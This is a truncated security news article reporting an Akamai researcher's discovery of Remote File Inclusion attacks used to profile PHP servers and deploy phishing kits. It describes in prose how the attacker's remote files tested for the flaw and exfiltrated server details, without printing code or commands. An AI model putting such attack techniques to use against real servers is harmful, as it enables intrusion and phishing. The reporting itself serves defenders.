A recently detected series of targeted attacks is attempting to exploit Remote File Inclusion (RFI) vulnerabilities to deploy phishing kits, Akamai has discovered.
RFI attacks attempt to exploit unchecked or improperly validated inclusion functions within vulnerable applications or websites. Most of these attacks target PHP, but these vulnerabilities can also be found in Java, ASP, and elsewhere.
Once an RFI attack is successful, the server would deliver the content of the attacker-controlled externally-called file, and this is what was happening as part of the recently discovered attacks as well, Akamai’s Larry Cashdollar reveals.
RFI attacks, the security researcher explains, could also lead to code execution, Cross Site Scripting (XSS), Denial of Service (DoS), or sensitive information disclosure.
The security researcher observed the attack on his own website, where server logs revealed GET requests linking to a text file, along with requests attempting to include a remote shell into the application running on the website.
The code in the text file was designed to check whether the server was vulnerable to RFI. If so, the context of the $SERVER_ADMIN variable would be sent back to the attacker.
The file also included a call to another external txt file, which included some information about the attacker, such as their email address, the fact they favor Portuguese for variable names ($assunto), and confirmation that they are profiling servers (it would gather information on what user HTTP is running under on the server, such as Apache or Root).
The researcher also noticed a request to a different text file from the same domain, which contained the necessary code to generate a phishing website targeting a well-k ..
Support the originator by clicking the read the rest link below.
